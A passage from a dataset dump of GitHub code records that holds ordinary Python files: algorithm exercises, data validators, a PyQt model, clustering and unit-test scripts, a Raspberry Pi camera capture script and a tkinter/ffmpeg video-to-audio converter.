[1 for i in range(n)]\n edges = []\n\n for i in range(m):\n x, y, z = inlt()\n edges.append([z, x, y])\n\n edges.sort()\n\n def find(x):\n if x != parents[x]:\n parents[x] = find(parents[x])\n return parents[x]\n\n def union(a, b):\n a = find(a)\n b = find(b)\n\n if rank[a] == rank[b]:\n rank[a] += 1\n elif rank[b] > rank[a]:\n a, b = b, a\n\n parents[b] = a\n\n res = 0\n edges_add = 0\n for z, x, y in edges:\n if find(x) != find(y):\n union(x, y)\n res = z\n edges_add += 1\n if edges_add == n-1:\n break\n\n print(res)\n\n","repo_name":"cybsbbb/codeforces_practice","sub_path":"contests/cs218_22fall/add_oil.py","file_name":"add_oil.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15044339074","text":"import string\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import NewType\nfrom typing import Optional\nfrom typing import Set\nfrom typing import Type\nfrom typing import Union\n\nfrom cdh_core_api.api.validation import field\nfrom cdh_core_api.api.validation import register_for_type\nfrom 
cdh_core_api.validation.abstract import InvalidType\nfrom cdh_core_api.validation.abstract import StringValidator\nfrom marshmallow import fields\nfrom marshmallow import validate\nfrom marshmallow.validate import Validator\n\nfrom cdh_core.entities.dataset import DatasetId\nfrom cdh_core.entities.dataset import DatasetTags\nfrom cdh_core.entities.dataset import SourceIdentifier\nfrom cdh_core.entities.dataset import SupportGroup\n\n\ndef generate_string_validation_field(\n validator: Union[Validator, Callable[[Any], Any]], default_metadata: Optional[Dict[str, Any]] = None\n) -> Type[fields.String]:\n \"\"\"Generate a marshmallow Field that can be used in conjunction with register_for_type.\"\"\"\n\n class _BaseValidationField(fields.String):\n def __init__(self, **kwargs: Any):\n if \"metadata\" not in kwargs and default_metadata is not None:\n kwargs[\"metadata\"] = default_metadata\n super().__init__(validate=validator, **kwargs)\n\n return _BaseValidationField\n\n\nvalidate_dataset_id = StringValidator(\n min_length=5,\n max_length=255,\n characters=string.ascii_lowercase + string.digits + \"_\",\n characters_description=\"ASCII letters, digits and _\",\n)\n\nDatasetIdField = generate_string_validation_field(\n validator=validate_dataset_id,\n default_metadata={\n \"description\": \"ID of the dataset\",\n \"example\": \"hr_data_src\",\n },\n)\nregister_for_type(DatasetId)(DatasetIdField)\n\n\ndef get_short_string_validator(allow_empty: bool = False) -> StringValidator:\n \"\"\"Build a validator for a short string attribute.\"\"\"\n return StringValidator(\n min_length=0 if allow_empty else 1,\n max_length=255,\n characters=string.ascii_letters + string.digits + \"_-:\",\n characters_description=\"ASCII letters, digits, _, -, and :\",\n )\n\n\nDeletableSupportGroup = NewType(\"DeletableSupportGroup\", SupportGroup)\nregister_for_type(SupportGroup)(generate_string_validation_field(validator=get_short_string_validator()))\nregister_for_type(DeletableSupportGroup)(generate_string_validation_field(validator=get_short_string_validator(True)))\n\nDATASET_SOURCE_IDENTIFIER_METADATA = {\"description\": \"ID of the data source system.\"}\nDeletableSourceIdentifier = NewType(\"DeletableSourceIdentifier\", SourceIdentifier)\nregister_for_type(SourceIdentifier)(\n generate_string_validation_field(\n validator=get_short_string_validator(), default_metadata=DATASET_SOURCE_IDENTIFIER_METADATA\n )\n)\nregister_for_type(DeletableSourceIdentifier)(\n generate_string_validation_field(\n validator=get_short_string_validator(True), default_metadata=DATASET_SOURCE_IDENTIFIER_METADATA\n )\n)\n\nvalidate_tag_key = StringValidator(\n min_length=1,\n max_length=45,\n characters=string.ascii_lowercase + string.digits + \"-\",\n characters_description=\"lowercase ASCII letters, digits, and -\",\n)\n\nvalidate_tag_value = StringValidator(\n min_length=1,\n max_length=100,\n characters=string.ascii_letters + string.digits + \"-\" + \" \" + \"&\",\n characters_description=\"ASCII letters, digits, space, &, and -\",\n)\n\n\n@register_for_type(DatasetTags)\nclass DatasetTagsField(fields.Dict):\n \"\"\"Validates dataset tags.\"\"\"\n\n def __init__(self, **kwargs: Any):\n super().__init__(\n keys=fields.String(validate=validate_tag_key), values=fields.String(validate=validate_tag_value), **kwargs\n )\n\n\nDATASET_LABELS_DESCRIPTION = (\n \"Can be used to track the legal entities or markets from which the contained data originates.\"\n)\n\n\ndef dataset_labels_field(**kwargs: Any) -> Any:\n \"\"\"Return a 
dataclasses.Field instance with the relevant metadata for the dataset_label.\"\"\"\n return field(\n default=None,\n metadata={\n \"marshmallow_field\": fields.List(\n fields.Str(validate=validate_dataset_label),\n required=False,\n validate=validate.Length(max=100),\n metadata={\n \"description\": DATASET_LABELS_DESCRIPTION,\n },\n ),\n },\n **kwargs,\n )\n\n\nvalidate_dataset_name = StringValidator(\n min_length=3,\n max_length=20,\n characters=string.ascii_lowercase + string.digits + \"_\",\n characters_description=\"lowercase ASCII letters, digits, and underscores\",\n)\nvalidate_dataset_friendly_name = StringValidator(\n min_length=1,\n max_length=40,\n characters=string.ascii_letters + string.digits + \"_- \",\n characters_description=\"ASCII letters, digits, spaces, -, and _\",\n)\nvalidate_dataset_description = StringValidator(min_length=5, max_length=1000, allow_newlines=True)\n# maximum item size: 400KB (https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Limits.html)\n# utf-8 characters need between 1 and 4 byte each\nvalidate_dataset_documentation = StringValidator(max_length=50_000, allow_newlines=True)\nvalidate_dataset_label = StringValidator(\n min_length=1,\n max_length=100,\n characters=string.ascii_letters + string.digits + \"_\",\n characters_description=\"ASCII letters, digits, and _\",\n)\n\n\ndef validate_dataset_lineage(lineage: object) -> Set[DatasetId]:\n \"\"\"Validate the dataset_lineage.\"\"\"\n if not isinstance(lineage, set):\n raise InvalidType(type(lineage), set)\n for dataset_id in lineage:\n validate_dataset_id(dataset_id)\n return lineage\n","repo_name":"SeaJean123/cdh_test","sub_path":"src/lambdas/cdh_core_api/cdh_core_api/validation/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38601949591","text":"import os\nfrom importlib.metadata import version\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom PyQt5.QtCore import QProcess\n\n\nclass Model(QObject):\n current_path_changed = pyqtSignal(str)\n file_path_changed = pyqtSignal(str)\n is_file_modified_changed = pyqtSignal(bool)\n onemodel_cli_read = pyqtSignal(str)\n\n def __init__(self):\n super().__init__()\n # Current working path of the app.\n self._current_path = QtCore.QDir.homePath()\n #self._current_path += '/Sync/python/workspace/onemodel/examples'\n os.chdir(self._current_path)\n\n # Current open file in the text editor.\n # If None, we don't have a file (or creating new).\n self._file_path = None\n\n # Is current open file modified by the text editor?\n self._is_file_modified = False\n\n # Process which will execute onemodel-cli.\n self._onemodel_cli = QProcess()\n self._onemodel_cli.setProcessChannelMode(QProcess.MergedChannels)\n self._onemodel_cli.readyRead.connect(self.on_onemodel_cli_read)\n\n # Version of the onemodel package.\n self.version = version('onemodel')\n\n @property\n def current_path(self):\n return self._current_path\n\n @current_path.setter\n def current_path(self, value):\n # Save new current_path.\n self._current_path = value\n\n # Change the working path of the app.\n os.chdir(value)\n\n # Update in model is reflected in view by sending a signal to view.\n self.current_path_changed.emit(value)\n\n @property\n def file_path(self):\n return self._file_path\n\n @file_path.setter\n def file_path(self, value):\n self._file_path = value\n self.file_path_changed.emit(value)\n 
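# a freshly opened or newly created file starts out unmodified\n 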
self.is_file_modified = False\n\n @property\n def is_file_modified(self):\n return self._is_file_modified\n\n @is_file_modified.setter\n def is_file_modified(self, value):\n self._is_file_modified = value\n self.is_file_modified_changed.emit(value)\n\n def on_onemodel_cli_read(self):\n text = self._onemodel_cli.readAll().data().decode()\n self.onemodel_cli_read.emit(text)\n","repo_name":"fernandonobel/onemodel-gui","sub_path":"src/onemodel_gui/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"39431639737","text":"\"\"\"\r\n450. Delete Node in a BST\r\nMedium\r\n\r\nGiven a root node reference of a BST and a key, delete the node with the given key in the BST. Return the root node reference (possibly updated) of the BST.\r\n\r\nBasically, the deletion can be divided into two stages:\r\n\r\n Search for a node to remove.\r\n If the node is found, delete the node.\r\n\r\nFollow up: Can you solve it with time complexity O(height of tree)?\r\n\r\nExample 1:\r\n\r\nInput: root = [5,3,6,2,4,null,7], key = 3\r\nOutput: [5,4,6,2,null,null,7]\r\nExplanation: Given key to delete is 3. So we find the node with value 3 and delete it.\r\nOne valid answer is [5,4,6,2,null,null,7], shown in the above BST.\r\nPlease notice that another valid answer is [5,2,6,null,4,null,7] and it's also accepted.\r\n\"\"\"\r\n\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, val=0, left=None, right=None):\r\n# self.val = val\r\n# self.left = left\r\n# self.right = right\r\nclass Solution:\r\n def deleteNode(self, root: TreeNode, key: int) -> TreeNode:\r\n if not root:\r\n return\r\n\r\n if key == root.val:\r\n \"\"\"\r\n Three cases:\r\n 1. Only the root node itself: return directly;\r\n 2. Only one child: return that child;\r\n 3. Two children: to keep the BST structure intact, replace the root's value with the largest node of the left subtree or the smallest node of the right subtree\r\n \"\"\"\r\n if not root.left:\r\n return root.right\r\n if not root.right:\r\n return root.left\r\n if root.left and root.right:\r\n root.val = self.minVal(root.right)\r\n # print(f\"root.val:{root.val}\")\r\n root.right = self.deleteNode(root.right, root.val)\r\n\r\n elif key < root.val:\r\n # update the left child\r\n root.left = self.deleteNode(root.left, key)\r\n\r\n elif key > root.val:\r\n root.right = self.deleteNode(root.right, key)\r\n\r\n return root\r\n\r\n def minVal(self, root: TreeNode) -> int:\r\n while root.left:\r\n root = root.left\r\n return root.val\r\n","repo_name":"klgentle/lc_python","sub_path":"leet_code/labuladong/tree/p0450_Delete_Node_in_a_BST.py","file_name":"p0450_Delete_Node_in_a_BST.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"32693375275","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.cluster import *\nfrom sklearn.neighbors import kneighbors_graph\nfrom sklearn.datasets import make_blobs\n\n\ndef run():\n plt.figure(figsize=(12, 12))\n\n n_samples = 1500\n random_state = 2\n X, yreal = make_blobs(n_samples=n_samples, random_state=random_state)\n bandwidth = estimate_bandwidth(X, quantile=0.3)\n # connectivity matrix for structured Ward\n connectivity = kneighbors_graph(X, n_neighbors=10, include_self=False)\n # make connectivity symmetric\n connectivity = 0.5 * (connectivity + connectivity.T)\n\n y_kmeans = KMeans(n_clusters=3, random_state=random_state).fit_predict(X)\n\n y_meanshift = MeanShift(bandwidth=bandwidth, bin_seeding=True).fit_predict(X)\n\n y_ward = 
AgglomerativeClustering(n_clusters=3, linkage='ward',\n connectivity=connectivity).fit_predict(X)\n y_spectral = SpectralClustering(n_clusters=3,\n eigen_solver='arpack',\n affinity=\"nearest_neighbors\").fit_predict(X)\n y_dbscan = DBSCAN(eps=0.5).fit_predict(X)\n y_affinity_propagation = AffinityPropagation(damping=.9,\n preference=-500).fit_predict(X)\n\n y_average_linkage = AgglomerativeClustering(\n linkage=\"average\", affinity=\"cityblock\", n_clusters=3,\n connectivity=connectivity).fit_predict(X)\n\n y_birch = Birch(n_clusters=3).fit_predict(X)\n\n plt.subplot(331)\n plt.scatter(X[:, 0], X[:, 1], c=yreal)\n plt.subplot(332)\n plt.scatter(X[:, 0], X[:, 1], c=y_kmeans)\n plt.subplot(333)\n plt.scatter(X[:, 0], X[:, 1], c=y_meanshift)\n plt.subplot(334)\n plt.scatter(X[:, 0], X[:, 1], c=y_ward)\n plt.subplot(335)\n plt.scatter(X[:, 0], X[:, 1], c=y_spectral)\n plt.subplot(336)\n plt.scatter(X[:, 0], X[:, 1], c=y_dbscan)\n plt.subplot(337)\n plt.scatter(X[:, 0], X[:, 1], c=y_affinity_propagation)\n plt.subplot(338)\n plt.scatter(X[:, 0], X[:, 1], c=y_average_linkage)\n plt.subplot(339)\n plt.scatter(X[:, 0], X[:, 1], c=y_birch)\n plt.show()\n\n","repo_name":"qwertylevel3/UPCF","sub_path":"util/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3430234481","text":"import unittest\n\nimport os\nimport sys\n\nsys.path.append(\n os.path.join(os.path.dirname(os.path.realpath(__file__)), \"..\"))\nfrom test_utils import TestCasePPAP\n\nfrom copy import deepcopy\nfrom random import uniform\n\nimport numpy as np\n\nfrom ppap4lmp import (\n create, StaCustom, StaMolecules, ProTimeCorrelationInMolecule, execute_omp)\n\nclass TestProTimeCorrelationInMolecule(TestCasePPAP):\n\n base_data = [\n {\"id\": 1, \"mol\": 1, \"xu\": 0.0, \"yu\": 1.0, \"zu\": 2.0},\n {\"id\": 2, \"mol\": 1, \"xu\": 2.0, \"yu\": 1.0, \"zu\": 0.0},\n {\"id\": 3, \"mol\": 1, \"xu\": 1.0, \"yu\": 2.0, \"zu\": 3.0},\n {\"id\": 4, \"mol\": 1, \"xu\": 3.0, \"yu\": 2.0, \"zu\": 1.0},\n {\"id\": 5, \"mol\": 1, \"xu\": 2.0, \"yu\": 3.0, \"zu\": 4.0},\n {\"id\": 6, \"mol\": 1, \"xu\": 4.0, \"yu\": 3.0, \"zu\": 2.0},\n ]\n\n def test_error01(self):\n\n dummy_data = deepcopy(self.base_data)\n\n for i in range(len(dummy_data)):\n del dummy_data[i][\"xu\"]\n\n atomses = [create(StaCustom(dummy_data)) for i in range(10)]\n molses = [create(StaMolecules(atoms)) for atoms in atomses]\n\n pro = ProTimeCorrelationInMolecule(list(zip(molses, atomses)))\n\n self.check_error_msg(\n \"RuntimeError: Missing key(s) 'xu' in ProTimeCorrelationInMolecule\", execute_omp, pro)\n\n def test_error02(self):\n\n atomses = [create(StaCustom(self.base_data)) for i in range(10)]\n molses = [create(StaCustom([{\"id\": 1}])) for i in range(10)]\n\n pro = ProTimeCorrelationInMolecule(list(zip(molses, atomses)))\n\n self.check_error_msg(\n \"RuntimeError: Missing key(s) 'atom-ids' in ProTimeCorrelationInMolecule\", execute_omp, pro)\n\n def test_error03(self):\n\n atoms_traj = []\n base_atoms = deepcopy(self.base_data)\n\n for i in range(2, 12):\n\n atoms_tmp = []\n\n for j in range(1, i):\n\n for k, atom in enumerate(base_atoms):\n atom[\"id\"] = (j-1) * len(base_atoms) + k + 1\n atom[\"mol\"] = j\n\n atoms_tmp.extend(deepcopy(base_atoms))\n\n atoms_traj.append(create(StaCustom(atoms_tmp)))\n\n mols_traj = [create(StaMolecules(atoms)) for atoms in atoms_traj]\n\n pro = ProTimeCorrelationInMolecule(list(zip(mols_traj, 
atoms_traj)))\n\n self.check_error_msg(\n \"RuntimeError: Number of molecules and molecular types must be unchanged\", execute_omp, pro)\n\n def test_rotate_stick(self):\n\n n_mols = 10\n\n rotate_data = []\n initial_atoms = []\n\n for imol in range(n_mols):\n\n ps = np.random.uniform(-10.0, 10.0, (3,3))\n\n m_point = 0.5 * (ps[0] + ps[1])\n\n cross = np.cross(ps[1] - ps[0], ps[2] - ps[0])\n n_vector = cross / np.linalg.norm(cross)\n\n rotate_data.append({\"normal\": n_vector, \"middle\": m_point})\n\n initial_atoms.extend([\n {\"id\": 2*imol+i+1, \"mol\": imol+1, \"xyz\": ps[i]}\n for i in range(2)\n ])\n\n atoms_traj = []\n\n for i in range(181):\n\n atoms_tmp = deepcopy(initial_atoms)\n\n for atom in atoms_tmp:\n\n m = rotate_data[atom[\"mol\"]-1][\"middle\"]\n n = rotate_data[atom[\"mol\"]-1][\"normal\"]\n\n rotated_xyz = np.array(rot(i, n, atom[\"xyz\"]-m)) + m\n\n atom[\"xu\"] = rotated_xyz[0]\n atom[\"yu\"] = rotated_xyz[1]\n atom[\"zu\"] = rotated_xyz[2]\n\n del atom[\"xyz\"]\n\n atoms_traj.append(create(StaCustom(atoms_tmp)))\n\n mols_traj = [create(StaMolecules(atoms)) for atoms in atoms_traj]\n\n pro = ProTimeCorrelationInMolecule(list(zip(mols_traj, atoms_traj)))\n pro.set_indices(0, 1)\n\n execute_omp(pro)\n\n expects = np.array([np.cos(i*np.pi/180) for i in range(181)])\n\n self.assertTrue(np.allclose(pro.get_time_correlation(), expects))\n\n\n# Functions to rotate a vector via quaternian\n\ndef q_mult(q1, q2):\n\n x1, y1, z1, w1 = q1\n x2, y2, z2, w2 = q2\n\n w = w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2\n x = w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2\n y = w1 * y2 + y1 * w2 + z1 * x2 - x1 * z2\n z = w1 * z2 + z1 * w2 + x1 * y2 - y1 * x2\n\n return x, y, z ,w\n\ndef q_conjugate(q):\n\n x, y, z ,w = q\n\n return -x, -y, -z, w\n\ndef rot(deg, n, v):\n\n c = np.cos(deg*np.pi/360)\n s = np.sin(deg*np.pi/360)\n\n q1 = [n[0]*s, n[1]*s, n[2]*s, c]\n q2 = list(v) + [0.0]\n\n return q_mult(q_mult(q1, q2), q_conjugate(q1))[:3]\n\nif __name__ == \"__main__\":\n\n suite = unittest.TestSuite()\n\n suite.addTest(TestProTimeCorrelationInMolecule(\"test_error01\"))\n suite.addTest(TestProTimeCorrelationInMolecule(\"test_error02\"))\n suite.addTest(TestProTimeCorrelationInMolecule(\"test_error03\"))\n suite.addTest(TestProTimeCorrelationInMolecule(\"test_rotate_stick\"))\n\n runner = unittest.TextTestRunner()\n runner.run(suite)\n","repo_name":"irisTa56/ppap4lmp","sub_path":"tests/tests_processor/test_ProTimeCorrelationInMolecule.py","file_name":"test_ProTimeCorrelationInMolecule.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"9422037395","text":"#!/usr/bin/env python3\nimport os\nimport time\nimport subprocess\nimport logging\n\nfrom picamera import PiCamera\n\nlogger = logging.getLogger(__name__)\n# Prepare camera\ncamera = PiCamera()\ncamera.rotation = 90\ncamera.brightness = 60\ndef get_file_name(content):\n images_default_path = \"/home/pi/Documents/Alarm/Images/\"\n video_default_path = \"/home/pi/Documents/Alarm/Videos/\"\n file_pattern = time.strftime(\"%H_%M_%S\")\n dir_pattern = time.strftime(\"%d-%m-%Y\")\n content = content.lower()\n\n if content == \"image\":\n dir_name = images_default_path + dir_pattern\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n logger.info (\"Directory for images with current date not found, creating %s\", dir_name)\n\n res_file_name = dir_name + \"/\" + file_pattern + \".png\"\n return res_file_name\n\n elif content == \"video\":\n dir_name = 
video_default_path + dir_pattern\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n logger.info(\"Directory for videos with current date not found, creating %s\", dir_name)\n\n res_file_name = dir_name + \"/\" + file_pattern + \".h264\"\n return res_file_name\n\n else:\n return None\n\ndef get_encoded_file_name(filename):\n filename = filename.split(\".\")\n filename[1] = \"mp4\"\n res_file_name = \".\".join(filename)\n\n return res_file_name\n\ndef capture_image(count=1):\n files_name_list = []\n\n for i in range(count):\n file_name = get_file_name(\"image\")\n camera.capture(file_name)\n time.sleep(1.5)\n logger.info(\"Captured image: %s\", file_name)\n files_name_list.append(file_name)\n\n return files_name_list\n\n\ndef capture_video(duration=60):\n files_name_list = []\n file_name = get_file_name(\"video\")\n encoded_file_name = get_encoded_file_name(file_name)\n logger.debug(\"encoded file name: %s\", encoded_file_name)\n\n camera.start_recording(file_name)\n time.sleep(duration)\n camera.stop_recording()\n time.sleep(3)\n logger.info(\"Captured video: %s\", file_name)\n # Convert from raw h264 to mp4 using gpac package\n try:\n subprocess.check_call([\"MP4Box\", \"-add\", file_name, encoded_file_name])\n files_name_list.append(encoded_file_name)\n logger.info(\"Successfully encoded video to mp4: %s\", encoded_file_name)\n except subprocess.CalledProcessError:\n files_name_list.append(file_name)\n logger.error(\"CalledProcessError raised while encoding, use raw %s\", file_name)\n except Exception as err:\n files_name_list.append(file_name)\n logger.error(\"Exception raised, message: %s\", err)\n\n return files_name_list\n","repo_name":"spellancer/rpi-alarm-system","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"36414804663","text":"import numpy as np\nimport random\nimport logging\nfrom sslplay.utils.ssplit import ssplit\n\ndef s3split(\n X, y, \n percentage_1, percentage_2, percentage_3, \n seed_1=1102, seed_2=1102, \n):\n\n assert percentage_1 >= 0\n assert percentage_2 >= 0\n assert percentage_3 >= 0\n assert percentage_1 + percentage_2 + percentage_3 > 0\n\n y = np.array(y)\n X = np.array(X)\n\n tmp_percentage_sum = percentage_1 + percentage_2 + percentage_3 + 0.0\n percentage_1 = percentage_1 / tmp_percentage_sum * 100\n percentage_2 = percentage_2 / tmp_percentage_sum * 100\n percentage_3 = percentage_3 / tmp_percentage_sum * 100\n\n int_n = len(y)\n assert X.shape[0] == int_n\n \n tmp_y_counts = np.unique(y, return_counts=True)\n assert np.min(tmp_y_counts[1]) >= 3\n\n array_classes = sorted(tmp_y_counts[0])\n int_n_classes = len(array_classes)\n assert np.max(array_classes) + 1 == int_n_classes\n\n X1, y1, Xtmp, ytmp = ssplit(\n X=X, y=y, \n percentage_1=percentage_1, \n percentage_2=100.0-percentage_1, \n min_el_1=1, \n min_el_2=2, \n seed=seed_1\n )\n\n X2, y2, X3, y3 = ssplit(\n X=Xtmp, y=ytmp, \n percentage_1=percentage_2, \n percentage_2=percentage_3, \n min_el_1=1, \n min_el_2=1, \n seed=seed_2\n )\n\n logging.debug(\"Set 1 expected percentage: \" + str(round(percentage_1, 4)) + \" | real percentage: \" + str(round(len(y1) / int_n * 100, 4)))\n logging.debug(\"Set 2 expected percentage: \" + str(round(percentage_2, 4)) + \" | real percentage: \" + str(round(len(y2) / int_n * 100, 4)))\n logging.debug(\"Set 3 expected percentage: \" + str(round(percentage_3, 4)) + \" | real percentage: \" + str(round(len(y3) / 
int_n * 100, 4)))\n\n return X1, y1, X2, y2, X3, y3\n","repo_name":"ngshya/ssl-play","sub_path":"sslplay/utils/s3split.py","file_name":"s3split.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9358475312","text":"s = input()\r\n\r\nmaxk = 0\r\nk = 0\r\nfor i in s:\r\n if i == \")\":\r\n k += 1\r\n else:\r\n maxk = max(maxk, k)\r\n k = 0\r\nmaxk = max(maxk, k)\r\nprint(maxk)\r\nprint(max(len(i) for i in s.split(\"(\")))\r\n","repo_name":"trofik00777/EgeInformatics","sub_path":"probn/01.04/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39532081739","text":"def seq():\r\n termos = int(input('Digite um número '))\r\n e = 1\r\n for fat in range(1,termos+1):\r\n fatorial = 1 \r\n i=1\r\n while i <= fat:\r\n fatorial = fatorial * i \r\n i = i + 1\r\n print('O fatorial de {} é {}.'.format(fat,fatorial))\r\n e = e + (1 / fatorial)\r\n print('E=',e)\r\ndef main():\r\n seq()\r\nmain() \r\n \r\n","repo_name":"kevenescovedo/exercicios-python-func-o-2-semestre-ADS-conteudo-da-p1","sub_path":"lista function/list 1/exercicio10.py","file_name":"exercicio10.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1833146509","text":"from matplotlib import pyplot as plt\nimport _init_path\nfrom datacollection.user_app.backend.app.post_processing import SequenceLoader\n\n\ndef show_image(img, title=\"show_image\"):\n ndim = img.ndim\n print(\"ndim:\", ndim)\n if img.ndim == 2:\n plt.imshow(img.cpu().numpy(), cmap=\"gray\")\n else:\n plt.imshow(img.cpu().numpy())\n plt.title(title)\n plt.show()\n\n\nif __name__ == \"__main__\":\n rec_id = \"12_19\"\n\n loader = SequenceLoader(rec_id=rec_id, device=\"cuda:0\", debug=True)\n\n print(\"device_id:\\n\", loader.device_id)\n print(\"depth_mode:\\n\", loader.depth_mode)\n print(\"pv_width:\\n\", loader.pv_width)\n print(\"pv_height:\\n\", loader.pv_height)\n print(\"depth_width:\\n\", loader.depth_width)\n print(\"depth_height:\\n\", loader.depth_height)\n print(\"num_frames:\\n\", loader.num_frames)\n print(\"pv_intrinsic:\\n\", loader.pv_intrinsic)\n print(\"pv2rig:\\n\", loader.pv2rig)\n print(\"depth2rig:\\n\", loader.depth2rig)\n print(\"depth_xy1:\\n\", loader.depth_xy1)\n print(\"depth_scale:\\n\", loader.depth_scale)\n\n loader.step_by_frame_id(100)\n print(\"frame_id:\\n\", loader.frame_id)\n points = loader.points\n print(\"points:\\n\", points.shape, points.dtype, points.device)\n color_img = loader.color_image\n print(\"color_img:\\n\", color_img.shape, color_img.dtype, color_img.device)\n depth_img = loader.depth_image\n print(\"depth_img:\\n\", depth_img.shape, depth_img.dtype, depth_img.device)\n depth_colored = loader.depth_colored\n print(\n \"depth_coloried:\\n\",\n depth_colored.shape,\n depth_colored.dtype,\n depth_colored.device,\n )\n\n show_image(color_img, title=\"color_img\")\n show_image(depth_img, title=\"depth_img\")\n show_image(depth_colored, title=\"depth_colored\")\n","repo_name":"Error-Dataset/data-collection","sub_path":"tests/sequence_loader.py","file_name":"sequence_loader.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"22699933807","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nLeetcode - Unique 
Email Addresses\r\nhttps://leetcode.com/problems/unique-email-addresses\r\n\r\nCreated on Mon Nov 19 18:01:33 2018\r\n@author: Arthur Dysart\r\n\"\"\"\r\n\r\n\r\n## REQUIRED MODULES\r\nimport sys\r\n\r\n\r\n## MODULE DEFINITIONS\r\nclass Solution:\r\n \"\"\"\r\n Traverse all elements of array\r\n\r\n Time complexity: O(n)\r\n - Iterate over all string elements\r\n Space complexity: O(n)\r\n - Amortized store all unique strings\r\n \"\"\"\r\n\r\n def count_unique_emails(self, a):\r\n \"\"\"\r\n Determines number of unique emails in input array.\r\n\r\n :param list[str] a: array of input emails\r\n :return: number of unique target emails\r\n :rtype: int\r\n \"\"\"\r\n if not a:\r\n return 0\r\n\r\n s = set()\r\n\r\n n = len(a)\r\n for i in range(n):\r\n l, r = a[i].split(\"@\")\r\n l = l.replace(\".\",\"\").split(\"+\")[0]\r\n m = \"@\".join([l, r])\r\n s.add(m)\r\n \r\n return len(s)\r\n\r\nclass Input:\r\n\r\n def stdin(self, sys_stdin):\r\n \"\"\"\r\n Imports standard input.\r\n\r\n :param _io.TextIOWrapper sys_stdin: standard input\r\n :return: array of input emails\r\n :rtype: list[str]\r\n \"\"\"\r\n inputs = [x.strip(\"[]\\n\") for x in sys_stdin]\r\n a = [x.strip(\"\\\"\")\r\n for x\r\n in inputs[0].split(\"\\\",\\\"\")]\r\n return a\r\n\r\n\r\n## MAIN MODULE\r\nif __name__ == \"__main__\":\r\n # Import exercise parameters\r\n a = Input()\\\r\n .stdin(sys.stdin)\r\n\r\n # Evaluate solution\r\n z = Solution()\\\r\n .count_unique_emails(a)\r\n print(z)\r\n\r\n\r\n## END OF FILE","repo_name":"arthurdysart/LeetCode","sub_path":"0929_unique_email_addresses/python_source.py","file_name":"python_source.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"72652078123","text":"'''\nresponsible for GUI, imports, and conversion\n'''\n\nfrom tkinter import * # imports all files from tkinter\nfrom tkinter import ttk # imports the themed widget set (ttk)\nimport ffmpeg # imports ffmpeg\nimport shutil # allows for the file to be copied into the program's folder, briefly, so that the code has access\nimport os # os is used so that the computer knows where paths to files are; removes copies\n # so that the user's memory isn't crowded with unnecessary junk\nfrom tkinter.filedialog import askopenfilename # this specific aspect is used to find the path to the user's file\nfrom PIL import Image, 
ImageTk\n\ncur_directory = os.getcwd()\n\n'''\nthis section is responsible for the uploading, conversion, and text of the file\n'''\n\n\n# function that opens a menu bar and allows the use to chose files that have the ending .mp4,\n # .avi, .webm, .mov, and .wav. Saves the value of that file to the originalFile variable\ndef open_file():\n file = askopenfilename(filetypes = [('mp4 Files', '*.mp4'),\n ('avi Files', '*.avi'),\n ('webm Files', '*.webm'),\n ('mov Files', '*.mov'),\n ('wav Files', '*.wav')])\n\n return file\n\n# this method is responsible for the heavy lifting; when the user choses a file (video) to open, it\n # takes that file, converts it so that it is only audio, then uploads it into the same file that\n # the folder is - for now. Later on, it will be possible to integrate this directly into the\n # conversion algorithm we're working on\n \ndef run_conversion():\n video = open_file() # creates a string 'video' with the location of the video user chose\n if video == '': # if the user cancels, '' is returned; catches the error\n return\n global cur_directory # creates a string 'cur_directory' with the location of the folder\n path = shutil.copy2(video, cur_directory) # creates variable of copy that is created in python folder\n \n # takes in the file that the user input; the file, currently, needs to be in the same folder as the code\n stream = ffmpeg.input(video)\n\n # separates the audio from the video file\n audio = stream.audio\n\n # creates a new ouput called 'outAudioWebM.wav' with the audio file that was created\n out = ffmpeg.output(audio, 'newSave.wav')\n\n # runs/(maybe opens, if you are on Windows) the file, just to listen to it and make sure it works\n out.run()\n\n os.remove(path)\n\n# root is the root window that this program uses. 
